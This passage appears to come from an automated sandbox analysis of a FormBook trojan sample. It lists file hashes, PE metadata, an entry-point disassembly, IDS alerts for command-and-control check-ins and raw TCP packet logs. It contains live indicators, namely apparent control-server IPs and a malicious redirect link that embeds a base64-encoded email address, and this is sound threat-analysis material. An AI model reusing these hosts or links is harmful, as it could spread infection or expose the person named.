                                                                                                                                                            https://r20.rs6.net/tn.jsp?f=0014mq83eSqn0kaNc_hoo4Y7UT70CU2szuYTIo-hWN-bnpW_37lKy8kj-ZVBURrzWkrqphuKB7_ms9nXnPsCeN19IzJrh7FdtpDLA4Kj_5L-vhd0fdO0dM7jglK-Up8iV8pyx42_d3yTzkepqtSfxwhK8VPKE9stEIggaZuWb2dYbLqBe29TKh8Ogxugd3aaVQ75Lx1LaOBkNtAONmqlxdzW5ntBeJPatCzzOiOxA0yob1MMiiM_pDmzKrEUemA3dzU&c=&ch=&__=/16:00/anVzdGluLmpvcmRhbkB3YXJyaW9yc2hlYXJ0LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 192.185.156.197

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            No context

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WrrCV4QR2J.exe.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\WrrCV4QR2J.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1304
                                                                                                                                                            Entropy (8bit):5.342479910699661
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4DRE4mKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHDRHmYHKh3oPtHo6hAHKzP
                                                                                                                                                            MD5:69F4C6D6E1A57244AD636131ED81FDCF
                                                                                                                                                            SHA1:3BC170B8ED30C1968102F43661A91C548A593634
                                                                                                                                                            SHA-256:243AF877C88EEE73B052788B4C8FD440B044D99FA7C9BAE286887A5D1888D6EA
                                                                                                                                                            SHA-512:07A5D721605890AAA7D27531E6597951C74ED2EBA51DF5BFC94C66980E88663AA19D32E662D493BF2BF5062526EB895947FF2EB8F952C81D43191AE2C698A108
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Speech, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\7e327r58

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\SysWOW64\isoburn.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):114688
                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):7.748908145630504
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                            File name:WrrCV4QR2J.exe
                                                                                                                                                            File size:786'432 bytes
                                                                                                                                                            MD5:26c7731786626894ce4fcc339951a26b
                                                                                                                                                            SHA1:5103ffe527e144a275696454b45b1bda26c152bd
                                                                                                                                                            SHA256:dc9c5d5251164a289cac05382c699c11fb51463f88fea60746dd571e1feeb5fc
                                                                                                                                                            SHA512:09f6b16bc15b7aa27f282d4870928622db04685edb14dde53a98e95bbb31bfa5bfe52f5da5d86ffbb4e542915f0019588f39ad69bd1963791d3290bda3130a1c
                                                                                                                                                            SSDEEP:12288:aY8YouBsfDr5camG+BhC4igF5Xmr12WTpYo62gYAlAd7BR6wT:aY8YoLffW5P3FW17TjHAOpB
                                                                                                                                                            TLSH:7BF4E00022F89BD5E17EABFA4C70711007B6792A6922EF0E4E9661DE1E71BC04572F5F
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ce..............0......F......v.... ........@.. .......................`............@................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:22ceac86b2968ee0

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

                                                                                                                                                            Entrypoint:0x4bd676
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x6563F09C [Mon Nov 27 01:27:56 2023 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                            Entrypoint Preview

                                                                                                                                                            Instruction
                                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                                            xor al, 34h
                                                                                                                                                            xor al, 34h
                                                                                                                                                            xor al, 35h
                                                                                                                                                            xor eax, 38464739h
                                                                                                                                                            push ebp
                                                                                                                                                            xor dh, byte ptr [354A464Fh]
                                                                                                                                                            push ebx
                                                                                                                                                            aaa
                                                                                                                                                            pop edx
                                                                                                                                                            xor al, 00h
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al

                                                                                                                                                            Data Directories

                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbd6240x4f.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000x4204.rsrc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc40000xc.reloc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                            Sections

                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x20000xbb6940xbb800False0.8672903645833333data7.765104825647267IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rsrc0xbe0000x42040x4400False0.23299632352941177data4.2977512789706305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .reloc0xc40000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                            Resources

                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                            RT_ICON0xbe1c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.4326241134751773
                                                                                                                                                            RT_ICON0xbe6280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.2607879924953096
                                                                                                                                                            RT_ICON0xbf6d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.1912863070539419
                                                                                                                                                            RT_GROUP_ICON0xc1c780x30data0.8125
                                                                                                                                                            RT_GROUP_ICON0xc1ca80x14data1.1
                                                                                                                                                            RT_VERSION0xc1cbc0x35cdata0.413953488372093
                                                                                                                                                            RT_MANIFEST0xc20180x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                            Imports

                                                                                                                                                            DLLImport
                                                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                                                            Network Behavior

                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                            192.168.2.474.208.236.18149743802855465 12/08/23-14:50:42.900472TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974380192.168.2.474.208.236.181
                                                                                                                                                            192.168.2.466.29.155.5449764802855465 12/08/23-14:51:57.012130TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976480192.168.2.466.29.155.54
                                                                                                                                                            192.168.2.485.159.66.9349776802855465 12/08/23-14:52:40.619764TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977680192.168.2.485.159.66.93
                                                                                                                                                            192.168.2.452.220.48.16149796802855465 12/08/23-14:53:57.335622TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979680192.168.2.452.220.48.161
                                                                                                                                                            192.168.2.437.97.254.2749792802855465 12/08/23-14:53:40.611998TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979280192.168.2.437.97.254.27
                                                                                                                                                            192.168.2.4162.222.226.7749739802855465 12/08/23-14:50:19.134288TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973980192.168.2.4162.222.226.77
                                                                                                                                                            192.168.2.4104.21.18.25349748802855465 12/08/23-14:50:56.404687TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974880192.168.2.4104.21.18.253
                                                                                                                                                            192.168.2.4107.178.250.17749788802855465 12/08/23-14:53:26.280190TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24978880192.168.2.4107.178.250.177
                                                                                                                                                            192.168.2.4162.241.252.16149780802855465 12/08/23-14:52:55.335271TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24978080192.168.2.4162.241.252.161
                                                                                                                                                            192.168.2.437.140.192.8949752802855465 12/08/23-14:51:11.265685TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975280192.168.2.437.140.192.89
                                                                                                                                                            192.168.2.434.117.26.5749768802855465 12/08/23-14:52:11.624074TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976880192.168.2.434.117.26.57
                                                                                                                                                            192.168.2.4131.153.147.9049756802855465 12/08/23-14:51:27.263886TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975680192.168.2.4131.153.147.90
                                                                                                                                                            192.168.2.481.169.145.7049772802855465 12/08/23-14:52:25.956590TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977280192.168.2.481.169.145.70
                                                                                                                                                            192.168.2.494.23.162.16349760802855465 12/08/23-14:51:42.204368TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976080192.168.2.494.23.162.163
                                                                                                                                                            192.168.2.4185.74.252.1149784802855465 12/08/23-14:53:10.644355TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24978480192.168.2.4185.74.252.11

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Dec 8, 2023 14:50:18.937170029 CET4973980192.168.2.4162.222.226.77
                                                                                                                                                            Dec 8, 2023 14:50:19.133296967 CET8049739162.222.226.77192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:19.133639097 CET4973980192.168.2.4162.222.226.77
                                                                                                                                                            Dec 8, 2023 14:50:19.134288073 CET4973980192.168.2.4162.222.226.77
                                                                                                                                                            Dec 8, 2023 14:50:19.330131054 CET8049739162.222.226.77192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:19.337153912 CET8049739162.222.226.77192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:19.337232113 CET8049739162.222.226.77192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:19.337452888 CET4973980192.168.2.4162.222.226.77
                                                                                                                                                            Dec 8, 2023 14:50:19.337987900 CET4973980192.168.2.4162.222.226.77
                                                                                                                                                            Dec 8, 2023 14:50:19.533921957 CET8049739162.222.226.77192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:34.664378881 CET4974080192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:34.831279993 CET804974074.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:34.831357956 CET4974080192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:34.831656933 CET4974080192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:34.998413086 CET804974074.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:35.005354881 CET804974074.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:35.005484104 CET804974074.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:35.005539894 CET4974080192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:36.342005014 CET4974080192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:37.358135939 CET4974180192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:37.525537014 CET804974174.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:37.525690079 CET4974180192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:37.526036978 CET4974180192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:37.693181038 CET804974174.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:37.699758053 CET804974174.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:37.699771881 CET804974174.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:37.699930906 CET4974180192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:39.029409885 CET4974180192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:40.045692921 CET4974280192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:40.212608099 CET804974274.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:40.212707996 CET4974280192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:40.213336945 CET4974280192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:40.380247116 CET804974274.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:40.380291939 CET804974274.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:40.380311012 CET804974274.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:40.380327940 CET804974274.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:40.380458117 CET804974274.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:40.380491972 CET804974274.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:40.380817890 CET804974274.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:40.380855083 CET804974274.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:40.380976915 CET804974274.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:40.387168884 CET804974274.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:40.387231112 CET804974274.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:40.387332916 CET4974280192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:41.716926098 CET4974280192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:42.732990026 CET4974380192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:42.900053978 CET804974374.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:42.900178909 CET4974380192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:42.900471926 CET4974380192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:43.067554951 CET804974374.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:43.073848963 CET804974374.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:43.074203968 CET804974374.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:43.074278116 CET4974380192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:43.074357986 CET4974380192.168.2.474.208.236.181
                                                                                                                                                            Dec 8, 2023 14:50:43.241399050 CET804974374.208.236.181192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:48.314276934 CET4974480192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:48.438580990 CET8049744104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:48.439062119 CET4974480192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:48.439062119 CET4974480192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:48.563493013 CET8049744104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:48.715878010 CET8049744104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:48.716059923 CET8049744104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:48.716135979 CET4974480192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:49.951237917 CET4974480192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:50.967309952 CET4974580192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:51.092092991 CET8049745104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:51.092261076 CET4974580192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:51.092530966 CET4974580192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:51.217211008 CET8049745104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:51.383552074 CET8049745104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:51.383776903 CET8049745104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:51.383879900 CET4974580192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:52.598052025 CET4974580192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:53.624420881 CET4974780192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:53.748687029 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.748953104 CET4974780192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:53.749476910 CET4974780192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:53.874031067 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874095917 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874147892 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874212027 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874243975 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874258995 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874289989 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874311924 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:54.028893948 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:54.028924942 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:54.029001951 CET4974780192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:55.263717890 CET4974780192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.280004978 CET4974880192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.404164076 CET8049748104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:56.404413939 CET4974880192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.404686928 CET4974880192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.530968904 CET8049748104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:56.686069965 CET8049748104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:56.686326027 CET8049748104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:56.686408997 CET4974880192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.687506914 CET8049748104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:56.687572956 CET4974880192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.693876028 CET4974880192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.817867041 CET8049748104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.289207935 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.564224005 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.564373016 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.564663887 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.840981960 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.846950054 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.847130060 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.847187042 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.847446918 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.847461939 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.847503901 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.848145962 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.848288059 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.848329067 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.848998070 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.849178076 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.849267006 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.850562096 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.850574970 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.850610971 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.122236013 CET804974937.140.192.89192.168.2.4
